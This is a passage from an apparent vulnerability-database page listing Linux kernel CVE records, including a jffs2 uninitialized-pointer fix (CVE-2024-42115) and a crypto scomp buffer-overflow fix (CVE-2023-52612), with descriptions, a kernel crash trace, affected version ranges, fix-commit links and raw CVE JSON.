          "url": "https://git.kernel.org/stable/c/5d3567caff2a1d678aa40cc74a54e1318941fad3"
        },
        {
          "url": "https://git.kernel.org/stable/c/a7ad105b12256ec7fb6d6d1a0e2e60f00b7da157"
        },
        {
          "url": "https://git.kernel.org/stable/c/aa1a19724fa2c31e97a9be48baedd4692b265157"
        },
        {
          "url": "https://git.kernel.org/stable/c/ccbde4b128ef9c73d14d0d7817d68ef795f6d131"
        }
      ],
      "title": "char: xillybus: Don\u0027t destroy workqueue from work item running on it",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-45007",
    "datePublished": "2024-09-04T19:54:49.037Z",
    "dateReserved": "2024-08-21T05:34:56.679Z",
    "dateUpdated": "2025-11-03T22:15:10.885Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-42115 (GCVE-0-2024-42115)

Vulnerability from cvelistv5 – Published: 2024-07-30 07:46 – Updated: 2026-01-05 10:51

Title

jffs2: Fix potential illegal address access in jffs2_free_inode

Summary

In the Linux kernel, the following vulnerability has been resolved: jffs2: Fix potential illegal address access in jffs2_free_inode During the stress testing of the jffs2 file system,the following abnormal printouts were found: [ 2430.649000] Unable to handle kernel paging request at virtual address 0069696969696948 [ 2430.649622] Mem abort info: [ 2430.649829] ESR = 0x96000004 [ 2430.650115] EC = 0x25: DABT (current EL), IL = 32 bits [ 2430.650564] SET = 0, FnV = 0 [ 2430.650795] EA = 0, S1PTW = 0 [ 2430.651032] FSC = 0x04: level 0 translation fault [ 2430.651446] Data abort info: [ 2430.651683] ISV = 0, ISS = 0x00000004 [ 2430.652001] CM = 0, WnR = 0 [ 2430.652558] [0069696969696948] address between user and kernel address ranges [ 2430.653265] Internal error: Oops: 96000004 [#1] PREEMPT SMP [ 2430.654512] CPU: 2 PID: 20919 Comm: cat Not tainted 5.15.25-g512f31242bf6 #33 [ 2430.655008] Hardware name: linux,dummy-virt (DT) [ 2430.655517] pstate: 20000005 (nzCv daif -PAN -UAO -TCO -DIT -SSBS BTYPE=--) [ 2430.656142] pc : kfree+0x78/0x348 [ 2430.656630] lr : jffs2_free_inode+0x24/0x48 [ 2430.657051] sp : ffff800009eebd10 [ 2430.657355] x29: ffff800009eebd10 x28: 0000000000000001 x27: 0000000000000000 [ 2430.658327] x26: ffff000038f09d80 x25: 0080000000000000 x24: ffff800009d38000 [ 2430.658919] x23: 5a5a5a5a5a5a5a5a x22: ffff000038f09d80 x21: ffff8000084f0d14 [ 2430.659434] x20: ffff0000bf9a6ac0 x19: 0169696969696940 x18: 0000000000000000 [ 2430.659969] x17: ffff8000b6506000 x16: ffff800009eec000 x15: 0000000000004000 [ 2430.660637] x14: 0000000000000000 x13: 00000001000820a1 x12: 00000000000d1b19 [ 2430.661345] x11: 0004000800000000 x10: 0000000000000001 x9 : ffff8000084f0d14 [ 2430.662025] x8 : ffff0000bf9a6b40 x7 : ffff0000bf9a6b48 x6 : 0000000003470302 [ 2430.662695] x5 : ffff00002e41dcc0 x4 : ffff0000bf9aa3b0 x3 : 0000000003470342 [ 2430.663486] x2 : 0000000000000000 x1 : ffff8000084f0d14 x0 : fffffc0000000000 [ 2430.664217] Call trace: [ 2430.664528] kfree+0x78/0x348 [ 2430.664855] jffs2_free_inode+0x24/0x48 [ 2430.665233] i_callback+0x24/0x50 [ 2430.665528] rcu_do_batch+0x1ac/0x448 [ 2430.665892] rcu_core+0x28c/0x3c8 [ 2430.666151] rcu_core_si+0x18/0x28 [ 2430.666473] __do_softirq+0x138/0x3cc [ 2430.666781] irq_exit+0xf0/0x110 [ 2430.667065] handle_domain_irq+0x6c/0x98 [ 2430.667447] gic_handle_irq+0xac/0xe8 [ 2430.667739] call_on_irq_stack+0x28/0x54 The parameter passed to kfree was 5a5a5a5a, which corresponds to the target field of the jffs_inode_info structure. It was found that all variables in the jffs_inode_info structure were 5a5a5a5a, except for the first member sem. It is suspected that these variables are not initialized because they were set to 5a5a5a5a during memory testing, which is meant to detect uninitialized memory.The sem variable is initialized in the function jffs2_i_init_once, while other members are initialized in the function jffs2_init_inode_info. The function jffs2_init_inode_info is called after iget_locked, but in the iget_locked function, the destroy_inode process is triggered, which releases the inode and consequently, the target member of the inode is not initialized.In concurrent high pressure scenarios, iget_locked may enter the destroy_inode branch as described in the code. Since the destroy_inode functionality of jffs2 only releases the target, the fix method is to set target to NULL in jffs2_i_init_once.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/b6c8b3e31eb88c850…
	https://git.kernel.org/stable/c/0b3246052e01e61a5…
	https://git.kernel.org/stable/c/6d6d94287f6365282…
	https://git.kernel.org/stable/c/5ca26334fc8a3711f…
	https://git.kernel.org/stable/c/751987a5d8ead0cc4…
	https://git.kernel.org/stable/c/d0bbbf31462a400be…
	https://git.kernel.org/stable/c/05fc1ef892f862c11…
	https://git.kernel.org/stable/c/af9a8730ddb6a4b2e…

Impacted products

Vendor

Product

Version

Linux

Affected: e22c11da0a8683d22011bbce18da493c079d67b3 , < b6c8b3e31eb88c85094d848a0bd8b4bafe67e4d8 (git)
Affected: 4fdcfab5b5537c21891e22e65996d4d0dd8ab4ca , < 0b3246052e01e61a55bb3a15b76acb006759fe67 (git)
Affected: 4fdcfab5b5537c21891e22e65996d4d0dd8ab4ca , < 6d6d94287f6365282bbf41e9a5b5281985970789 (git)
Affected: 4fdcfab5b5537c21891e22e65996d4d0dd8ab4ca , < 5ca26334fc8a3711fed14db7f9eb1c621be4df65 (git)
Affected: 4fdcfab5b5537c21891e22e65996d4d0dd8ab4ca , < 751987a5d8ead0cc405fad96e83ebbaa51c82dbc (git)
Affected: 4fdcfab5b5537c21891e22e65996d4d0dd8ab4ca , < d0bbbf31462a400bef4df33e22de91864f475455 (git)
Affected: 4fdcfab5b5537c21891e22e65996d4d0dd8ab4ca , < 05fc1ef892f862c1197b11b288bc00f602d2df0c (git)
Affected: 4fdcfab5b5537c21891e22e65996d4d0dd8ab4ca , < af9a8730ddb6a4b2edd779ccc0aceb994d616830 (git)
Affected: 44a476cf0bc2209c3c91ad9815cccc4a5ea2ca72 (git)
Affected: 90a015d4d782371571058672be7fecbc685e34ec (git)
Affected: ff250f4c804f342695c35e1a39b63666086f2cab (git)
Affected: f9c04ee063108bfe16a7232429402866aa0ddd26 (git)
Affected: 66559d395933540c5ae7fd26aacec1ddbe579a29 (git)

Linux

Affected: 5.1
Unaffected: 0 , < 5.1 (semver)
Unaffected: 4.19.318 , ≤ 4.19.* (semver)
Unaffected: 5.4.280 , ≤ 5.4.* (semver)
Unaffected: 5.10.222 , ≤ 5.10.* (semver)
Unaffected: 5.15.163 , ≤ 5.15.* (semver)
Unaffected: 6.1.98 , ≤ 6.1.* (semver)
Unaffected: 6.6.39 , ≤ 6.6.* (semver)
Unaffected: 6.9.9 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:01:50.018Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b6c8b3e31eb88c85094d848a0bd8b4bafe67e4d8"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/0b3246052e01e61a55bb3a15b76acb006759fe67"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/6d6d94287f6365282bbf41e9a5b5281985970789"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/5ca26334fc8a3711fed14db7f9eb1c621be4df65"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/751987a5d8ead0cc405fad96e83ebbaa51c82dbc"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/d0bbbf31462a400bef4df33e22de91864f475455"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/05fc1ef892f862c1197b11b288bc00f602d2df0c"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/af9a8730ddb6a4b2edd779ccc0aceb994d616830"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-42115",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:17:16.786814Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:06.015Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/jffs2/super.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "b6c8b3e31eb88c85094d848a0bd8b4bafe67e4d8",
              "status": "affected",
              "version": "e22c11da0a8683d22011bbce18da493c079d67b3",
              "versionType": "git"
            },
            {
              "lessThan": "0b3246052e01e61a55bb3a15b76acb006759fe67",
              "status": "affected",
              "version": "4fdcfab5b5537c21891e22e65996d4d0dd8ab4ca",
              "versionType": "git"
            },
            {
              "lessThan": "6d6d94287f6365282bbf41e9a5b5281985970789",
              "status": "affected",
              "version": "4fdcfab5b5537c21891e22e65996d4d0dd8ab4ca",
              "versionType": "git"
            },
            {
              "lessThan": "5ca26334fc8a3711fed14db7f9eb1c621be4df65",
              "status": "affected",
              "version": "4fdcfab5b5537c21891e22e65996d4d0dd8ab4ca",
              "versionType": "git"
            },
            {
              "lessThan": "751987a5d8ead0cc405fad96e83ebbaa51c82dbc",
              "status": "affected",
              "version": "4fdcfab5b5537c21891e22e65996d4d0dd8ab4ca",
              "versionType": "git"
            },
            {
              "lessThan": "d0bbbf31462a400bef4df33e22de91864f475455",
              "status": "affected",
              "version": "4fdcfab5b5537c21891e22e65996d4d0dd8ab4ca",
              "versionType": "git"
            },
            {
              "lessThan": "05fc1ef892f862c1197b11b288bc00f602d2df0c",
              "status": "affected",
              "version": "4fdcfab5b5537c21891e22e65996d4d0dd8ab4ca",
              "versionType": "git"
            },
            {
              "lessThan": "af9a8730ddb6a4b2edd779ccc0aceb994d616830",
              "status": "affected",
              "version": "4fdcfab5b5537c21891e22e65996d4d0dd8ab4ca",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "44a476cf0bc2209c3c91ad9815cccc4a5ea2ca72",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "90a015d4d782371571058672be7fecbc685e34ec",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "ff250f4c804f342695c35e1a39b63666086f2cab",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "f9c04ee063108bfe16a7232429402866aa0ddd26",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "66559d395933540c5ae7fd26aacec1ddbe579a29",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "fs/jffs2/super.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.1"
            },
            {
              "lessThan": "5.1",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.318",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.280",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.222",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.163",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.98",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.39",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.9",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.318",
                  "versionStartIncluding": "4.19.41",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.280",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.222",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.163",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.98",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.39",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.9",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "3.18.140",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "4.4.180",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "4.9.174",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "4.14.117",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "5.0.14",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\njffs2: Fix potential illegal address access in jffs2_free_inode\n\nDuring the stress testing of the jffs2 file system,the following\nabnormal printouts were found:\n[ 2430.649000] Unable to handle kernel paging request at virtual address 0069696969696948\n[ 2430.649622] Mem abort info:\n[ 2430.649829]   ESR = 0x96000004\n[ 2430.650115]   EC = 0x25: DABT (current EL), IL = 32 bits\n[ 2430.650564]   SET = 0, FnV = 0\n[ 2430.650795]   EA = 0, S1PTW = 0\n[ 2430.651032]   FSC = 0x04: level 0 translation fault\n[ 2430.651446] Data abort info:\n[ 2430.651683]   ISV = 0, ISS = 0x00000004\n[ 2430.652001]   CM = 0, WnR = 0\n[ 2430.652558] [0069696969696948] address between user and kernel address ranges\n[ 2430.653265] Internal error: Oops: 96000004 [#1] PREEMPT SMP\n[ 2430.654512] CPU: 2 PID: 20919 Comm: cat Not tainted 5.15.25-g512f31242bf6 #33\n[ 2430.655008] Hardware name: linux,dummy-virt (DT)\n[ 2430.655517] pstate: 20000005 (nzCv daif -PAN -UAO -TCO -DIT -SSBS BTYPE=--)\n[ 2430.656142] pc : kfree+0x78/0x348\n[ 2430.656630] lr : jffs2_free_inode+0x24/0x48\n[ 2430.657051] sp : ffff800009eebd10\n[ 2430.657355] x29: ffff800009eebd10 x28: 0000000000000001 x27: 0000000000000000\n[ 2430.658327] x26: ffff000038f09d80 x25: 0080000000000000 x24: ffff800009d38000\n[ 2430.658919] x23: 5a5a5a5a5a5a5a5a x22: ffff000038f09d80 x21: ffff8000084f0d14\n[ 2430.659434] x20: ffff0000bf9a6ac0 x19: 0169696969696940 x18: 0000000000000000\n[ 2430.659969] x17: ffff8000b6506000 x16: ffff800009eec000 x15: 0000000000004000\n[ 2430.660637] x14: 0000000000000000 x13: 00000001000820a1 x12: 00000000000d1b19\n[ 2430.661345] x11: 0004000800000000 x10: 0000000000000001 x9 : ffff8000084f0d14\n[ 2430.662025] x8 : ffff0000bf9a6b40 x7 : ffff0000bf9a6b48 x6 : 0000000003470302\n[ 2430.662695] x5 : ffff00002e41dcc0 x4 : ffff0000bf9aa3b0 x3 : 0000000003470342\n[ 2430.663486] x2 : 0000000000000000 x1 : ffff8000084f0d14 x0 : fffffc0000000000\n[ 2430.664217] Call trace:\n[ 2430.664528]  kfree+0x78/0x348\n[ 2430.664855]  jffs2_free_inode+0x24/0x48\n[ 2430.665233]  i_callback+0x24/0x50\n[ 2430.665528]  rcu_do_batch+0x1ac/0x448\n[ 2430.665892]  rcu_core+0x28c/0x3c8\n[ 2430.666151]  rcu_core_si+0x18/0x28\n[ 2430.666473]  __do_softirq+0x138/0x3cc\n[ 2430.666781]  irq_exit+0xf0/0x110\n[ 2430.667065]  handle_domain_irq+0x6c/0x98\n[ 2430.667447]  gic_handle_irq+0xac/0xe8\n[ 2430.667739]  call_on_irq_stack+0x28/0x54\nThe parameter passed to kfree was 5a5a5a5a, which corresponds to the target field of\nthe jffs_inode_info structure. It was found that all variables in the jffs_inode_info\nstructure were 5a5a5a5a, except for the first member sem. It is suspected that these\nvariables are not initialized because they were set to 5a5a5a5a during memory testing,\nwhich is meant to detect uninitialized memory.The sem variable is initialized in the\nfunction jffs2_i_init_once, while other members are initialized in\nthe function jffs2_init_inode_info.\n\nThe function jffs2_init_inode_info is called after iget_locked,\nbut in the iget_locked function, the destroy_inode process is triggered,\nwhich releases the inode and consequently, the target member of the inode\nis not initialized.In concurrent high pressure scenarios, iget_locked\nmay enter the destroy_inode branch as described in the code.\n\nSince the destroy_inode functionality of jffs2 only releases the target,\nthe fix method is to set target to NULL in jffs2_i_init_once."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T10:51:54.974Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/b6c8b3e31eb88c85094d848a0bd8b4bafe67e4d8"
        },
        {
          "url": "https://git.kernel.org/stable/c/0b3246052e01e61a55bb3a15b76acb006759fe67"
        },
        {
          "url": "https://git.kernel.org/stable/c/6d6d94287f6365282bbf41e9a5b5281985970789"
        },
        {
          "url": "https://git.kernel.org/stable/c/5ca26334fc8a3711fed14db7f9eb1c621be4df65"
        },
        {
          "url": "https://git.kernel.org/stable/c/751987a5d8ead0cc405fad96e83ebbaa51c82dbc"
        },
        {
          "url": "https://git.kernel.org/stable/c/d0bbbf31462a400bef4df33e22de91864f475455"
        },
        {
          "url": "https://git.kernel.org/stable/c/05fc1ef892f862c1197b11b288bc00f602d2df0c"
        },
        {
          "url": "https://git.kernel.org/stable/c/af9a8730ddb6a4b2edd779ccc0aceb994d616830"
        }
      ],
      "title": "jffs2: Fix potential illegal address access in jffs2_free_inode",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-42115",
    "datePublished": "2024-07-30T07:46:08.276Z",
    "dateReserved": "2024-07-29T15:50:41.178Z",
    "dateUpdated": "2026-01-05T10:51:54.974Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2023-52612 (GCVE-0-2023-52612)

Vulnerability from cvelistv5 – Published: 2024-03-18 10:07 – Updated: 2025-05-04 07:39

Title

crypto: scomp - fix req->dst buffer overflow

Summary

In the Linux kernel, the following vulnerability has been resolved: crypto: scomp - fix req->dst buffer overflow The req->dst buffer size should be checked before copying from the scomp_scratch->dst to avoid req->dst buffer overflow problem.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/1142d65c5b8815909…
	https://git.kernel.org/stable/c/e0e3f4a18784182cf…
	https://git.kernel.org/stable/c/4518dc468cdd79675…
	https://git.kernel.org/stable/c/a5f2f91b3fd7387e5…
	https://git.kernel.org/stable/c/4df0c942d04a67df1…
	https://git.kernel.org/stable/c/7d9e5bed036a7f9e2…
	https://git.kernel.org/stable/c/71c6670f9f032ec67…
	https://git.kernel.org/stable/c/744e1885922a99434…

Impacted products

Vendor

Product

Version

Linux

Affected: 1ab53a77b772bf7369464a0e4fa6fd6499acf8f1 , < 1142d65c5b881590962ad763f94505b6dd67d2fe (git)
Affected: 1ab53a77b772bf7369464a0e4fa6fd6499acf8f1 , < e0e3f4a18784182cfe34e20c00eca11e78d53e76 (git)
Affected: 1ab53a77b772bf7369464a0e4fa6fd6499acf8f1 , < 4518dc468cdd796757190515a9be7408adc8911e (git)
Affected: 1ab53a77b772bf7369464a0e4fa6fd6499acf8f1 , < a5f2f91b3fd7387e5102060809316a0f8f0bc625 (git)
Affected: 1ab53a77b772bf7369464a0e4fa6fd6499acf8f1 , < 4df0c942d04a67df174195ad8082f6e30e7f71a5 (git)
Affected: 1ab53a77b772bf7369464a0e4fa6fd6499acf8f1 , < 7d9e5bed036a7f9e2062a137e97e3c1e77fb8759 (git)
Affected: 1ab53a77b772bf7369464a0e4fa6fd6499acf8f1 , < 71c6670f9f032ec67d8f4e3f8db4646bf5a62883 (git)
Affected: 1ab53a77b772bf7369464a0e4fa6fd6499acf8f1 , < 744e1885922a9943458954cfea917b31064b4131 (git)

Linux

Affected: 4.10
Unaffected: 0 , < 4.10 (semver)
Unaffected: 4.19.306 , ≤ 4.19.* (semver)
Unaffected: 5.4.268 , ≤ 5.4.* (semver)
Unaffected: 5.10.209 , ≤ 5.10.* (semver)
Unaffected: 5.15.148 , ≤ 5.15.* (semver)
Unaffected: 6.1.75 , ≤ 6.1.* (semver)
Unaffected: 6.6.14 , ≤ 6.6.* (semver)
Unaffected: 6.7.2 , ≤ 6.7.* (semver)
Unaffected: 6.8 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2023-52612",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-03-18T15:42:02.603013Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-04T17:24:15.790Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T23:03:21.332Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/1142d65c5b881590962ad763f94505b6dd67d2fe"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e0e3f4a18784182cfe34e20c00eca11e78d53e76"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/4518dc468cdd796757190515a9be7408adc8911e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/a5f2f91b3fd7387e5102060809316a0f8f0bc625"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/4df0c942d04a67df174195ad8082f6e30e7f71a5"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/7d9e5bed036a7f9e2062a137e97e3c1e77fb8759"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/71c6670f9f032ec67d8f4e3f8db4646bf5a62883"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/744e1885922a9943458954cfea917b31064b4131"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "crypto/scompress.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "1142d65c5b881590962ad763f94505b6dd67d2fe",
              "status": "affected",
              "version": "1ab53a77b772bf7369464a0e4fa6fd6499acf8f1",
              "versionType": "git"
            },
            {
              "lessThan": "e0e3f4a18784182cfe34e20c00eca11e78d53e76",
              "status": "affected",
              "version": "1ab53a77b772bf7369464a0e4fa6fd6499acf8f1",
              "versionType": "git"
            },
            {
              "lessThan": "4518dc468cdd796757190515a9be7408adc8911e",
              "status": "affected",
              "version": "1ab53a77b772bf7369464a0e4fa6fd6499acf8f1",
              "versionType": "git"
            },
            {
              "lessThan": "a5f2f91b3fd7387e5102060809316a0f8f0bc625",
              "status": "affected",
              "version": "1ab53a77b772bf7369464a0e4fa6fd6499acf8f1",
              "versionType": "git"
            },
            {
              "lessThan": "4df0c942d04a67df174195ad8082f6e30e7f71a5",
              "status": "affected",
              "version": "1ab53a77b772bf7369464a0e4fa6fd6499acf8f1",
              "versionType": "git"
            },
            {
              "lessThan": "7d9e5bed036a7f9e2062a137e97e3c1e77fb8759",
              "status": "affected",
              "version": "1ab53a77b772bf7369464a0e4fa6fd6499acf8f1",
              "versionType": "git"
            },
            {
              "lessThan": "71c6670f9f032ec67d8f4e3f8db4646bf5a62883",
              "status": "affected",
              "version": "1ab53a77b772bf7369464a0e4fa6fd6499acf8f1",
              "versionType": "git"
            },
            {
              "lessThan": "744e1885922a9943458954cfea917b31064b4131",
              "status": "affected",
              "version": "1ab53a77b772bf7369464a0e4fa6fd6499acf8f1",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "crypto/scompress.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.10"
            },
            {
              "lessThan": "4.10",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.306",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.268",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.209",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.148",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.75",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.14",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.2",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.8",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.306",
                  "versionStartIncluding": "4.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.268",
                  "versionStartIncluding": "4.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.209",
                  "versionStartIncluding": "4.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.148",
                  "versionStartIncluding": "4.10",
